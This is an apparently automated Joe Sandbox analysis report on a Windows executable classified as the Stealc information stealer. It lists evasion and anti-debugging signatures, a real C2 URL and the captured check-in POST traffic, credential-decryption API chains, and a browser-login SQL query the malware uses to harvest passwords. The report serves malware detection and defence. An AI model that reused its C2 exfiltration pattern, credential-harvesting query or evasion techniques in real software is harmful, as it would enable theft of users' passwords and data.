Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543417
MD5:87f5c5f97ee636b82e53d3f3acb6ed2b
SHA1:3aeeb3e7a4ca578ffbbe685c88ae689f141ee68d
SHA256:0de3e0a7d01986ca6a969204c0dfb41fc50e24c992694ee629508e913643246c
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 87F5C5F97EE636B82E53D3F3ACB6ED2B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6316JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6316JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.bd0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-27T20:15:10.393892+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.bd0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00BE9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00BDA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00BD72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00BDA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00BDC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BE40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BDE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BDF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BE47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BD1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BDDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BE3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BE4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BDEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BDBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BDDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 42 45 39 32 42 44 32 46 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="hwid"8BBE92BD2FCE2914648374------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build"tale------HCFIIIJJKJKFHIDGDBAK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00BD62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 42 45 39 32 42 44 32 46 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="hwid"8BBE92BD2FCE2914648374------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="build"tale------HCFIIIJJKJKFHIDGDBAK--
                Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$
                Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php-S
                Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
                Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpQS
                Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C100980_2_00C10098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010370170_2_01037017
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2B1980_2_00C2B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C021380_2_00C02138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C142880_2_00C14288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109A3400_2_0109A340
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E2580_2_00C3E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4D39E0_2_00C4D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5B3080_2_00C5B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F544760_2_00F54476
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F15EB0_2_010F15EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C145A80_2_00C145A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3D5A80_2_00C3D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010414A60_2_010414A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF45730_2_00BF4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE5440_2_00BFE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C166C80_2_00C166C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C596FD0_2_00C596FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4A6480_2_00C4A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010357960_2_01035796
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103F6180_2_0103F618
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C467990_2_00C46799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2D7200_2_00C2D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F8D60_2_00C3F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010339650_2_01033965
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102E9650_2_0102E965
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2B8A80_2_00C2B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C298B80_2_00C298B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C248680_2_00C24868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA181A0_2_00FA181A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2BAB20_2_00F2BAB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004B940_2_01004B94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103DBB60_2_0103DBB6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F20A1C0_2_00F20A1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C40B880_2_00C40B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44BA80_2_00C44BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103AD7F0_2_0103AD7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4AC280_2_00C4AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C24DC80_2_00C24DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C25DB90_2_00C25DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2BD680_2_00C2BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C01D780_2_00C01D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3AD380_2_00C3AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C41EE80_2_00C41EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E1F910_2_010E1F91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C18E780_2_00C18E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6EE4B0_2_00F6EE4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01031E650_2_01031E65
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BD4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: pbjioyes ZLIB complexity 0.9948463417139869
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BE9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00BE3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4398I723.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2151424 > 1048576
                Source: file.exeStatic PE information: Raw size of pbjioyes is bigger than: 0x100000 < 0x1a2400
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.bd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pbjioyes:EW;xrzszivt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pbjioyes:EW;xrzszivt:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BE9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x21a361 should be: 0x21100f
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: pbjioyes
                Source: file.exeStatic PE information: section name: xrzszivt
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109F106 push eax; mov dword ptr [esp], 41F6725Ah0_2_0109F10B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109F106 push esi; mov dword ptr [esp], ebp0_2_0109F137
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFA0F2 push eax; retf 0_2_00BFA119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114215B push 41279E96h; mov dword ptr [esp], esi0_2_011421B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFA0DC push eax; retf 0_2_00BFA0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112119C push edi; mov dword ptr [esp], 6F7FAF78h0_2_011211BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112119C push ecx; mov dword ptr [esp], 00603025h0_2_011212C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE9019 push edx; mov dword ptr [esp], eax0_2_00EE902C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE9019 push edx; mov dword ptr [esp], edi0_2_00EE9036
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE9019 push ebp; mov dword ptr [esp], 00000000h0_2_00EE904A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BC01A push edx; mov dword ptr [esp], ebp0_2_010BC042
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BC01A push eax; mov dword ptr [esp], ecx0_2_010BC073
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push 6C5AF0F6h; mov dword ptr [esp], edi0_2_01037020
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push esi; mov dword ptr [esp], eax0_2_01037029
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push eax; mov dword ptr [esp], edi0_2_01037054
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push 184EAD5Ch; mov dword ptr [esp], edi0_2_0103708C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push 621BB8DEh; mov dword ptr [esp], eax0_2_0103714E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push ecx; mov dword ptr [esp], eax0_2_010371D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push edi; mov dword ptr [esp], edx0_2_010371E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push ecx; mov dword ptr [esp], edi0_2_0103722D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push ebx; mov dword ptr [esp], edx0_2_01037328
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push 55EC382Ah; mov dword ptr [esp], edi0_2_01037336
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push 43F20C6Ah; mov dword ptr [esp], ebp0_2_0103734F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push edi; mov dword ptr [esp], 7FB7553Fh0_2_010373B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push edx; mov dword ptr [esp], ebx0_2_010373F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push eax; mov dword ptr [esp], 423FC3C5h0_2_01037410
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push edi; mov dword ptr [esp], ecx0_2_01037449
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push eax; mov dword ptr [esp], ebp0_2_01037504
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push 2850656Ch; mov dword ptr [esp], eax0_2_0103753B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push ebx; mov dword ptr [esp], ecx0_2_0103755C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037017 push 3968BA61h; mov dword ptr [esp], ebp0_2_010375A2
                Source: file.exeStatic PE information: section name: pbjioyes entropy: 7.95363539760933

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
